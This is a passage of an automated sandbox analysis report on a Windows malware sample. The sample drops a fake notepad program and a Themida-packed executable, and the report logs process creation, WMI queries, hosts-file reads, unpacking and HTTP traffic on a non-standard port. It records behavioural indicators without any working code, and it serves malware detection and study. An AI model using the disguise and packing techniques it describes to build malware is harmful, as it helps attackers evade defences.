                      Source: C:\Users\user\AppData\Roaming\1234.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\1234.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\1234.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                      Source: C:\Users\user\AppData\Roaming\1234.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\1234.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                      Source: C:\Users\user\AppData\Roaming\1234.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\1234.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\1234.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\1234.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\1234.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\1234.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\1234.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\1234.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\1234.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\1234.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: Nb2HQZZDIf.exeVirustotal: Detection: 22%
                      Source: Nb2HQZZDIf.exeReversingLabs: Detection: 25%
                      Source: unknownProcess created: C:\Users\user\Desktop\Nb2HQZZDIf.exe 'C:\Users\user\Desktop\Nb2HQZZDIf.exe'
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeProcess created: C:\Users\user\AppData\Roaming\1234.exe C:\Users\user\AppData\Roaming\1234.exe 1234
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess created: C:\Users\user\AppData\Roaming\1234.exe {path}
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess created: C:\Users\user\AppData\Roaming\1234.exe {path}
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess created: C:\Users\user\AppData\Local\Temp\srvs.exe 'C:\Users\user\AppData\Local\Temp\srvs.exe'
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeProcess created: C:\Users\user\AppData\Roaming\1234.exe C:\Users\user\AppData\Roaming\1234.exe 1234
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess created: C:\Users\user\AppData\Roaming\1234.exe {path}
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess created: C:\Users\user\AppData\Roaming\1234.exe {path}
                      Source: C:\Users\user\AppData\Roaming\1234.exeProcess created: C:\Users\user\AppData\Local\Temp\srvs.exe 'C:\Users\user\AppData\Local\Temp\srvs.exe'
                      Source: C:\Users\user\AppData\Roaming\1234.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\AppData\Roaming\1234.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: Nb2HQZZDIf.exeStatic PE information: Image base 0x140000000 > 0x60000000
                      Source: Binary string: Z:\Oreans Projects\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: srvs.exe, 00000015.00000002.480413638.0000000001182000.00000040.00020000.sdmp

                      Data Obfuscation:

                      barindex
                      Detected unpacking (changes PE section rights)Show sources
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeUnpacked PE file: 0.2.Nb2HQZZDIf.exe.140000000.2.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeUnpacked PE file: 21.2.srvs.exe.df0000.0.unpack :ER; :R; :R;.vm_sec:W;.idata:W;.vimp0:ER;.themida:EW;.boot:ER;.vimp0:ER;.rsrc:R; vs :ER; :R; :R;
                      .NET source code contains potential unpackerShow sources
                      Source: 1234.exe.0.dr, uNotepad/Form1.cs.Net Code: TJbSoEaROH1pxHedh9d System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 2.0.1234.exe.cf0000.0.unpack, uNotepad/Form1.cs.Net Code: TJbSoEaROH1pxHedh9d System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 2.2.1234.exe.cf0000.0.unpack, uNotepad/Form1.cs.Net Code: TJbSoEaROH1pxHedh9d System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 14.2.1234.exe.2e0000.0.unpack, uNotepad/Form1.cs.Net Code: TJbSoEaROH1pxHedh9d System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 14.0.1234.exe.2e0000.0.unpack, uNotepad/Form1.cs.Net Code: TJbSoEaROH1pxHedh9d System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: srvs.exe.15.drStatic PE information: 0xE3EEDDA9 [Wed Mar 7 05:05:45 2091 UTC]
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140060290 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetOpenW,InternetOpenUrlW,FreeLibrary,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,InternetCloseHandle,FreeLibrary,DeleteFileW,FreeLibrary,
                      Source: initial sampleStatic PE information: section where entry point is pointing to: .MPRESS2
                      Source: 1234.exe.0.drStatic PE information: real checksum: 0x0 should be: 0xf8b72
                      Source: Nb2HQZZDIf.exeStatic PE information: real checksum: 0x99744 should be: 0xa8478
                      Source: Nb2HQZZDIf.exeStatic PE information: section name: .MPRESS1
                      Source: Nb2HQZZDIf.exeStatic PE information: section name: .MPRESS2
                      Source: srvs.exe.15.drStatic PE information: section name:
                      Source: srvs.exe.15.drStatic PE information: section name:
                      Source: srvs.exe.15.drStatic PE information: section name:
                      Source: srvs.exe.15.drStatic PE information: section name: .vm_sec
                      Source: srvs.exe.15.drStatic PE information: section name: .vimp0
                      Source: srvs.exe.15.drStatic PE information: section name: .themida
                      Source: srvs.exe.15.drStatic PE information: section name: .boot
                      Source: srvs.exe.15.drStatic PE information: section name: .vimp0
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_3_00931234 push ss; ret
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_3_009B669E pushad ; retf
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_3_009B5593 pushfd ; ret
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_3_009B09D4 pushfd ; ret
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_3_009AEE08 push esi; retn 0000h
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_3_009B9770 pushfd ; ret
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400C2620 push rax; retf
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400C2630 push rax; retf
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 2_2_0160F960 push esp; iretd
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 2_2_017E112D push FFFFFF8Bh; iretd
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 2_2_079047E9 push 1441A4BAh; iretd
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 15_2_0297EEC0 push ecx; ret
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 15_2_0297F100 push ecx; ret
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeCode function: 21_2_031D4215 push FFFFFF8Bh; iretd
                      Source: initial sampleStatic PE information: section name: .MPRESS1 entropy: 7.9995184158
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.5685116349
                      Source: initial sampleStatic PE information: section name: entropy: 7.98684257143
                      Source: initial sampleStatic PE information: section name: .vimp0 entropy: 7.99703516028
                      Source: initial sampleStatic PE information: section name: .vimp0 entropy: 7.29946899453
                      Source: 1234.exe.0.dr, uNotepad/Form_Main.csHigh entropy of concatenated method names: '.ctor', 'ResizeControls', 'Form_Main_Load', 'Form_Main_FormClosing', 'button_Convert_Click', 'Form_Main_Resize', 'button_Select_Click', 'button_Clear_Click', 'Form_Main_DragEnter', 'Form_Main_DragDrop'
                      Source: 1234.exe.0.dr, uNotepad/MDSDDD.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'InitializeComponent', 'xQYrXMQK3oruP2n78EE', 'qI2V5sQmkMFPdZKK7RT', 'v2BxR9Q29gDG9OoMaun', 'Oy6h3XQJUWJ0pO5lsiJ', 'lvpUrfQFbZ41gMl8ChU', 'V9TqPbQ9L1478wb6Rri', 'AsM2hEQPFjt8MQXoJBn'
                      Source: 1234.exe.0.dr, uNotepad/Form1.csHigh entropy of concatenated method names: '.ctor', 'AddFormToTabPage', 'Form1_Load', 'toolButtonNew_Click', 'toolButtonSave_Click', 'toolButtonOpen_Click', 'kapatToolStripMenuItem_Click', 'yaziRengiToolStripMenuItem_Click', 'yaziTipiToolStripMenuItem_Click', 'hepsiBuyukToolStripMenuItem_Click'
                      Source: 1234.exe.0.dr, uNotepad/MainWindow.csHigh entropy of concatenated method names: '.ctor', 'Draw', 'ChooseFillType', 'StartSorting', 'Sorting', 'Sorting2', 'DisableControls', 'EnableControls', 'txtbSwapCost_TextChanged', 'txtbSwapCost2_TextChanged'
                      Source: 1234.exe.0.dr, uNotepad/CollectionToSort.csHigh entropy of concatenated method names: 'set_ModSwapCost', 'set_ModComparisonCost', '.ctor', 'BubbleSort', 'InsertionSort', 'SelectionSort', 'Merge', 'MergeSort', 'ShellSort', 'CombSort'
                      Source: 1234.exe.0.dr, uNotepad/AramaFormu.csHigh entropy of concatenated method names: '.ctor', 'btnAra_Click', 'btnIptal_Click', 'Dispose', 'InitializeComponent', 'vq7PjyhUAd7MRkefWD', 'QoZQYfS9Radq0iYew9', 'HW5Pmc0r3FxacGfIMM', 'eR5IKkXfgPFddBVEtT', 'fqFEGAbrnWeHxXrodt'
                      Source: 1234.exe.0.dr, uNotepad/About.csHigh entropy of concatenated method names: '.ctor', 'btnOK_Click', 'Dispose', 'InitializeComponent', 'O7iYVnQ8fijTtIhHIa', 'LobEx4sRuX3pYvhqG1', 'wDtNXwHRAUHdKDIewc', 'Bjwo1gT75dUFXW4TKT', 'OHgtsoIUhxi7DTZZsj', 'FYQft6BgvEERMwMpIU'
                      Source: 1234.exe.0.dr, uNotepad/CollectionOfElements.csHigh entropy of concatenated method names: 'get_GetPictureBox', 'get_modBuffer', 'getElementValue', 'getElementSepperation', 'getElementWidth', 'getElementColor', 'get_modHeight', 'get_modNumberOfElements', '.ctor', 'DrawElements'
                      Source: 1234.exe.0.dr, uNotepad/TextUtility.csHigh entropy of concatenated method names: 'LoadTextToTextBox', 'QBTcamIJwnfhXp5d0d3', 'ykja5WIFRtXhAOiwvuL', 'rTCUjqI95QdxLALSyjg', 'mj4y5GIPVV7aGuQsJp4', 'WihXS9I2YQbW7IsCipf', 'tRp4m3IKYO0jK390DjC'
                      Source: 1234.exe.0.dr, uNotepad/uNote.csHigh entropy of concatenated method names: '.ctor', 'get_fileName', 'set_fileName', 'Kaydet', 'DosyaAc', 'YaziRengiDegistir', 'YaziTipiDegistir', 'YaziBuyukHarfYap', 'YaziKucukHarfYap', 'Ara'
                      Source: 2.0.1234.exe.cf0000.0.unpack, uNotepad/MDSDDD.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'InitializeComponent', 'xQYrXMQK3oruP2n78EE', 'qI2V5sQmkMFPdZKK7RT', 'v2BxR9Q29gDG9OoMaun', 'Oy6h3XQJUWJ0pO5lsiJ', 'lvpUrfQFbZ41gMl8ChU', 'V9TqPbQ9L1478wb6Rri', 'AsM2hEQPFjt8MQXoJBn'
                      Source: 2.0.1234.exe.cf0000.0.unpack, uNotepad/Form1.csHigh entropy of concatenated method names: '.ctor', 'AddFormToTabPage', 'Form1_Load', 'toolButtonNew_Click', 'toolButtonSave_Click', 'toolButtonOpen_Click', 'kapatToolStripMenuItem_Click', 'yaziRengiToolStripMenuItem_Click', 'yaziTipiToolStripMenuItem_Click', 'hepsiBuyukToolStripMenuItem_Click'
                      Source: 2.0.1234.exe.cf0000.0.unpack, uNotepad/CollectionToSort.csHigh entropy of concatenated method names: 'set_ModSwapCost', 'set_ModComparisonCost', '.ctor', 'BubbleSort', 'InsertionSort', 'SelectionSort', 'Merge', 'MergeSort', 'ShellSort', 'CombSort'
                      Source: 2.0.1234.exe.cf0000.0.unpack, uNotepad/uNote.csHigh entropy of concatenated method names: '.ctor', 'get_fileName', 'set_fileName', 'Kaydet', 'DosyaAc', 'YaziRengiDegistir', 'YaziTipiDegistir', 'YaziBuyukHarfYap', 'YaziKucukHarfYap', 'Ara'
                      Source: 2.0.1234.exe.cf0000.0.unpack, uNotepad/About.csHigh entropy of concatenated method names: '.ctor', 'btnOK_Click', 'Dispose', 'InitializeComponent', 'O7iYVnQ8fijTtIhHIa', 'LobEx4sRuX3pYvhqG1', 'wDtNXwHRAUHdKDIewc', 'Bjwo1gT75dUFXW4TKT', 'OHgtsoIUhxi7DTZZsj', 'FYQft6BgvEERMwMpIU'
                      Source: 2.0.1234.exe.cf0000.0.unpack, uNotepad/AramaFormu.csHigh entropy of concatenated method names: '.ctor', 'btnAra_Click', 'btnIptal_Click', 'Dispose', 'InitializeComponent', 'vq7PjyhUAd7MRkefWD', 'QoZQYfS9Radq0iYew9', 'HW5Pmc0r3FxacGfIMM', 'eR5IKkXfgPFddBVEtT', 'fqFEGAbrnWeHxXrodt'
                      Source: 2.0.1234.exe.cf0000.0.unpack, uNotepad/CollectionOfElements.csHigh entropy of concatenated method names: 'get_GetPictureBox', 'get_modBuffer', 'getElementValue', 'getElementSepperation', 'getElementWidth', 'getElementColor', 'get_modHeight', 'get_modNumberOfElements', '.ctor', 'DrawElements'
                      Source: 2.0.1234.exe.cf0000.0.unpack, uNotepad/TextUtility.csHigh entropy of concatenated method names: 'LoadTextToTextBox', 'QBTcamIJwnfhXp5d0d3', 'ykja5WIFRtXhAOiwvuL', 'rTCUjqI95QdxLALSyjg', 'mj4y5GIPVV7aGuQsJp4', 'WihXS9I2YQbW7IsCipf', 'tRp4m3IKYO0jK390DjC'
                      Source: 2.0.1234.exe.cf0000.0.unpack, uNotepad/Form_Main.csHigh entropy of concatenated method names: '.ctor', 'ResizeControls', 'Form_Main_Load', 'Form_Main_FormClosing', 'button_Convert_Click', 'Form_Main_Resize', 'button_Select_Click', 'button_Clear_Click', 'Form_Main_DragEnter', 'Form_Main_DragDrop'
                      Source: 2.0.1234.exe.cf0000.0.unpack, uNotepad/MainWindow.csHigh entropy of concatenated method names: '.ctor', 'Draw', 'ChooseFillType', 'StartSorting', 'Sorting', 'Sorting2', 'DisableControls', 'EnableControls', 'txtbSwapCost_TextChanged', 'txtbSwapCost2_TextChanged'
                      Source: 2.2.1234.exe.cf0000.0.unpack, uNotepad/Form_Main.csHigh entropy of concatenated method names: '.ctor', 'ResizeControls', 'Form_Main_Load', 'Form_Main_FormClosing', 'button_Convert_Click', 'Form_Main_Resize', 'button_Select_Click', 'button_Clear_Click', 'Form_Main_DragEnter', 'Form_Main_DragDrop'
                      Source: 2.2.1234.exe.cf0000.0.unpack, uNotepad/MDSDDD.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'InitializeComponent', 'xQYrXMQK3oruP2n78EE', 'qI2V5sQmkMFPdZKK7RT', 'v2BxR9Q29gDG9OoMaun', 'Oy6h3XQJUWJ0pO5lsiJ', 'lvpUrfQFbZ41gMl8ChU', 'V9TqPbQ9L1478wb6Rri', 'AsM2hEQPFjt8MQXoJBn'
                      Source: 2.2.1234.exe.cf0000.0.unpack, uNotepad/MainWindow.csHigh entropy of concatenated method names: '.ctor', 'Draw', 'ChooseFillType', 'StartSorting', 'Sorting', 'Sorting2', 'DisableControls', 'EnableControls', 'txtbSwapCost_TextChanged', 'txtbSwapCost2_TextChanged'
                      Source: 2.2.1234.exe.cf0000.0.unpack, uNotepad/Form1.csHigh entropy of concatenated method names: '.ctor', 'AddFormToTabPage', 'Form1_Load', 'toolButtonNew_Click', 'toolButtonSave_Click', 'toolButtonOpen_Click', 'kapatToolStripMenuItem_Click', 'yaziRengiToolStripMenuItem_Click', 'yaziTipiToolStripMenuItem_Click', 'hepsiBuyukToolStripMenuItem_Click'
                      Source: 2.2.1234.exe.cf0000.0.unpack, uNotepad/CollectionToSort.csHigh entropy of concatenated method names: 'set_ModSwapCost', 'set_ModComparisonCost', '.ctor', 'BubbleSort', 'InsertionSort', 'SelectionSort', 'Merge', 'MergeSort', 'ShellSort', 'CombSort'
                      Source: 2.2.1234.exe.cf0000.0.unpack, uNotepad/uNote.csHigh entropy of concatenated method names: '.ctor', 'get_fileName', 'set_fileName', 'Kaydet', 'DosyaAc', 'YaziRengiDegistir', 'YaziTipiDegistir', 'YaziBuyukHarfYap', 'YaziKucukHarfYap', 'Ara'
                      Source: 2.2.1234.exe.cf0000.0.unpack, uNotepad/About.csHigh entropy of concatenated method names: '.ctor', 'btnOK_Click', 'Dispose', 'InitializeComponent', 'O7iYVnQ8fijTtIhHIa', 'LobEx4sRuX3pYvhqG1', 'wDtNXwHRAUHdKDIewc', 'Bjwo1gT75dUFXW4TKT', 'OHgtsoIUhxi7DTZZsj', 'FYQft6BgvEERMwMpIU'
                      Source: 2.2.1234.exe.cf0000.0.unpack, uNotepad/AramaFormu.csHigh entropy of concatenated method names: '.ctor', 'btnAra_Click', 'btnIptal_Click', 'Dispose', 'InitializeComponent', 'vq7PjyhUAd7MRkefWD', 'QoZQYfS9Radq0iYew9', 'HW5Pmc0r3FxacGfIMM', 'eR5IKkXfgPFddBVEtT', 'fqFEGAbrnWeHxXrodt'
                      Source: 2.2.1234.exe.cf0000.0.unpack, uNotepad/CollectionOfElements.csHigh entropy of concatenated method names: 'get_GetPictureBox', 'get_modBuffer', 'getElementValue', 'getElementSepperation', 'getElementWidth', 'getElementColor', 'get_modHeight', 'get_modNumberOfElements', '.ctor', 'DrawElements'
                      Source: 2.2.1234.exe.cf0000.0.unpack, uNotepad/TextUtility.csHigh entropy of concatenated method names: 'LoadTextToTextBox', 'QBTcamIJwnfhXp5d0d3', 'ykja5WIFRtXhAOiwvuL', 'rTCUjqI95QdxLALSyjg', 'mj4y5GIPVV7aGuQsJp4', 'WihXS9I2YQbW7IsCipf', 'tRp4m3IKYO0jK390DjC'
                      Source: 14.2.1234.exe.2e0000.0.unpack, uNotepad/MDSDDD.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'InitializeComponent', 'xQYrXMQK3oruP2n78EE', 'qI2V5sQmkMFPdZKK7RT', 'v2BxR9Q29gDG9OoMaun', 'Oy6h3XQJUWJ0pO5lsiJ', 'lvpUrfQFbZ41gMl8ChU', 'V9TqPbQ9L1478wb6Rri', 'AsM2hEQPFjt8MQXoJBn'
                      Source: 14.2.1234.exe.2e0000.0.unpack, uNotepad/Form1.csHigh entropy of concatenated method names: '.ctor', 'AddFormToTabPage', 'Form1_Load', 'toolButtonNew_Click', 'toolButtonSave_Click', 'toolButtonOpen_Click', 'kapatToolStripMenuItem_Click', 'yaziRengiToolStripMenuItem_Click', 'yaziTipiToolStripMenuItem_Click', 'hepsiBuyukToolStripMenuItem_Click'
                      Source: 14.2.1234.exe.2e0000.0.unpack, uNotepad/CollectionToSort.csHigh entropy of concatenated method names: 'set_ModSwapCost', 'set_ModComparisonCost', '.ctor', 'BubbleSort', 'InsertionSort', 'SelectionSort', 'Merge', 'MergeSort', 'ShellSort', 'CombSort'
                      Source: 14.2.1234.exe.2e0000.0.unpack, uNotepad/uNote.csHigh entropy of concatenated method names: '.ctor', 'get_fileName', 'set_fileName', 'Kaydet', 'DosyaAc', 'YaziRengiDegistir', 'YaziTipiDegistir', 'YaziBuyukHarfYap', 'YaziKucukHarfYap', 'Ara'
                      Source: 14.2.1234.exe.2e0000.0.unpack, uNotepad/About.csHigh entropy of concatenated method names: '.ctor', 'btnOK_Click', 'Dispose', 'InitializeComponent', 'O7iYVnQ8fijTtIhHIa', 'LobEx4sRuX3pYvhqG1', 'wDtNXwHRAUHdKDIewc', 'Bjwo1gT75dUFXW4TKT', 'OHgtsoIUhxi7DTZZsj', 'FYQft6BgvEERMwMpIU'
                      Source: 14.2.1234.exe.2e0000.0.unpack, uNotepad/AramaFormu.csHigh entropy of concatenated method names: '.ctor', 'btnAra_Click', 'btnIptal_Click', 'Dispose', 'InitializeComponent', 'vq7PjyhUAd7MRkefWD', 'QoZQYfS9Radq0iYew9', 'HW5Pmc0r3FxacGfIMM', 'eR5IKkXfgPFddBVEtT', 'fqFEGAbrnWeHxXrodt'
                      Source: 14.2.1234.exe.2e0000.0.unpack, uNotepad/CollectionOfElements.csHigh entropy of concatenated method names: 'get_GetPictureBox', 'get_modBuffer', 'getElementValue', 'getElementSepperation', 'getElementWidth', 'getElementColor', 'get_modHeight', 'get_modNumberOfElements', '.ctor', 'DrawElements'
                      Source: 14.2.1234.exe.2e0000.0.unpack, uNotepad/TextUtility.csHigh entropy of concatenated method names: 'LoadTextToTextBox', 'QBTcamIJwnfhXp5d0d3', 'ykja5WIFRtXhAOiwvuL', 'rTCUjqI95QdxLALSyjg', 'mj4y5GIPVV7aGuQsJp4', 'WihXS9I2YQbW7IsCipf', 'tRp4m3IKYO0jK390DjC'
                      Source: 14.2.1234.exe.2e0000.0.unpack, uNotepad/Form_Main.csHigh entropy of concatenated method names: '.ctor', 'ResizeControls', 'Form_Main_Load', 'Form_Main_FormClosing', 'button_Convert_Click', 'Form_Main_Resize', 'button_Select_Click', 'button_Clear_Click', 'Form_Main_DragEnter', 'Form_Main_DragDrop'
                      Source: 14.2.1234.exe.2e0000.0.unpack, uNotepad/MainWindow.csHigh entropy of concatenated method names: '.ctor', 'Draw', 'ChooseFillType', 'StartSorting', 'Sorting', 'Sorting2', 'DisableControls', 'EnableControls', 'txtbSwapCost_TextChanged', 'txtbSwapCost2_TextChanged'
                      Source: 14.0.1234.exe.2e0000.0.unpack, uNotepad/MDSDDD.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'InitializeComponent', 'xQYrXMQK3oruP2n78EE', 'qI2V5sQmkMFPdZKK7RT', 'v2BxR9Q29gDG9OoMaun', 'Oy6h3XQJUWJ0pO5lsiJ', 'lvpUrfQFbZ41gMl8ChU', 'V9TqPbQ9L1478wb6Rri', 'AsM2hEQPFjt8MQXoJBn'
                      Source: 14.0.1234.exe.2e0000.0.unpack, uNotepad/Form1.csHigh entropy of concatenated method names: '.ctor', 'AddFormToTabPage', 'Form1_Load', 'toolButtonNew_Click', 'toolButtonSave_Click', 'toolButtonOpen_Click', 'kapatToolStripMenuItem_Click', 'yaziRengiToolStripMenuItem_Click', 'yaziTipiToolStripMenuItem_Click', 'hepsiBuyukToolStripMenuItem_Click'
                      Source: 14.0.1234.exe.2e0000.0.unpack, uNotepad/CollectionToSort.csHigh entropy of concatenated method names: 'set_ModSwapCost', 'set_ModComparisonCost', '.ctor', 'BubbleSort', 'InsertionSort', 'SelectionSort', 'Merge', 'MergeSort', 'ShellSort', 'CombSort'
                      Source: 14.0.1234.exe.2e0000.0.unpack, uNotepad/uNote.csHigh entropy of concatenated method names: '.ctor', 'get_fileName', 'set_fileName', 'Kaydet', 'DosyaAc', 'YaziRengiDegistir', 'YaziTipiDegistir', 'YaziBuyukHarfYap', 'YaziKucukHarfYap', 'Ara'
                      Source: 14.0.1234.exe.2e0000.0.unpack, uNotepad/About.csHigh entropy of concatenated method names: '.ctor', 'btnOK_Click', 'Dispose', 'InitializeComponent', 'O7iYVnQ8fijTtIhHIa', 'LobEx4sRuX3pYvhqG1', 'wDtNXwHRAUHdKDIewc', 'Bjwo1gT75dUFXW4TKT', 'OHgtsoIUhxi7DTZZsj', 'FYQft6BgvEERMwMpIU'
                      Source: 14.0.1234.exe.2e0000.0.unpack, uNotepad/AramaFormu.csHigh entropy of concatenated method names: '.ctor', 'btnAra_Click', 'btnIptal_Click', 'Dispose', 'InitializeComponent', 'vq7PjyhUAd7MRkefWD', 'QoZQYfS9Radq0iYew9', 'HW5Pmc0r3FxacGfIMM', 'eR5IKkXfgPFddBVEtT', 'fqFEGAbrnWeHxXrodt'
                      Source: 14.0.1234.exe.2e0000.0.unpack, uNotepad/CollectionOfElements.csHigh entropy of concatenated method names: 'get_GetPictureBox', 'get_modBuffer', 'getElementValue', 'getElementSepperation', 'getElementWidth', 'getElementColor', 'get_modHeight', 'get_modNumberOfElements', '.ctor', 'DrawElements'
                      Source: 14.0.1234.exe.2e0000.0.unpack, uNotepad/TextUtility.csHigh entropy of concatenated method names: 'LoadTextToTextBox', 'QBTcamIJwnfhXp5d0d3', 'ykja5WIFRtXhAOiwvuL', 'rTCUjqI95QdxLALSyjg', 'mj4y5GIPVV7aGuQsJp4', 'WihXS9I2YQbW7IsCipf', 'tRp4m3IKYO0jK390DjC'
                      Source: 14.0.1234.exe.2e0000.0.unpack, uNotepad/Form_Main.csHigh entropy of concatenated method names: '.ctor', 'ResizeControls', 'Form_Main_Load', 'Form_Main_FormClosing', 'button_Convert_Click', 'Form_Main_Resize', 'button_Select_Click', 'button_Clear_Click', 'Form_Main_DragEnter', 'Form_Main_DragDrop'
                      Source: 14.0.1234.exe.2e0000.0.unpack, uNotepad/MainWindow.csHigh entropy of concatenated method names: '.ctor', 'Draw', 'ChooseFillType', 'StartSorting', 'Sorting', 'Sorting2', 'DisableControls', 'EnableControls', 'txtbSwapCost_TextChanged', 'txtbSwapCost2_TextChanged'
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeFile created: C:\Users\user\AppData\Roaming\1234.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\1234.exeFile created: C:\Users\user\AppData\Local\Temp\srvs.exeJump to dropped file

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Uses known network protocols on non-standard portsShow sources
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 32800
                      Source: unknownNetwork traffic detected: HTTP traffic on port 32800 -> 49751
                      Source: unknownNetwork traffic detected: HTTP traffic on port 32800 -> 49751
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 32800
                      Source: unknownNetwork traffic detected: HTTP traffic on port 32800 -> 49753
                      Source: unknownNetwork traffic detected: HTTP traffic on port 32800 -> 49753
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 32800
                      Source: unknownNetwork traffic detected: HTTP traffic on port 32800 -> 49754
                      Source: unknownNetwork traffic detected: HTTP traffic on port 32800 -> 49754
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014008B0A0 GetForegroundWindow,IsWindowVisible,IsIconic,ShowWindow,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400881E0 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014008B280 GetWindowThreadProcessId,GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,BringWindowToTop,
